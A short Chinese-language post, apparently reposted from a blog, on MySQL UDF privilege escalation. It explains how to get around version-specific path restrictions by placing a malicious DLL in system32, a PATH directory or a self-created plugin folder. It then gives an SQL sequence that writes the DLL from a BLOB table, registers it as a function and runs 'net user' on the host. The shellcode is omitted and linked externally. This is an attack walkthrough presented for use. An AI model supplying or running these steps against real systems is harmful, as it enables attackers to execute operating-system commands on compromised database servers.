转了点说明过来

mysql中支持UDF扩展 ，使得我们可以调用DLL里面的函数来实现一些特殊的功能。
但是对于UDF的具体限制，MYSQL的各个版本各有不同。 下面记录一下：

MYSQL 4.1以前的版本中，可以将所有的DLL文件里面的任何函数都注册到MYSQL里面以供MYSQL调用。
无论这个DLL在什么位置，函数的声明是什么样的。

MYSQL 4.1及以后的版本中，对UDF函数进行了限制，只有实现了一个特定接口的函数才可以被成功注册到MYSQL中，

MYSQL5以后，对注册的DLL的位置有了限制，创建函数的时候，所对应的DLL不能包含/或者\，简单的理解就是不能是绝对路径。所以我们将DLL释放到system32目录，来跳过这个限制。。或者放到盘符的根目录下通过c:udf.dll这种形式的写法来跳过限制。

只要把dll放到PATH这个环境变量所表示的任何一个目录下面，效果跟放到system32目录下面一样。

Can't open shared library 'udf.dll'

这是因为MYSQL 5.1及以后的版本中，又多了一个限制。
创建函数时所用的DLL只能放在mysql的plugin目录里面
而且这个plugin目录默认是不存在的

那么自己在mysql安装目录下建lib/plugin 文件夹，把udf.dll导到这里就行

这里又有个技巧，显示mysql的安装路径  SHOW VARIABLES LIKE '%plugin%';

-----------------------------------------------------------------

UDF使用（建表，这个表有个装二进制内容的字段，把udf.dll的内容二进制写到表中，导出DLL，建立方法，调用方法）
有的人问怎么在没shell的情况下提权，如果你知道上面这些，也就是UDF流程，那么我想你应该懂了。

shellcode太长，baidu 又不让发，只好给链接
http://www.ganyoo.com/home-space-uid-1-do-blog-id-900.html

CREATE TABLE stream_udf (shellcode BLOB);

INSERT into stream_udf  values (CONVERT(传说中的shellcode，因为太长，要的去赣友网下,CHAR));

Create Function state returns string soname 'streamudf.dll';

select state('net user');

DROP TABLE stream_udf;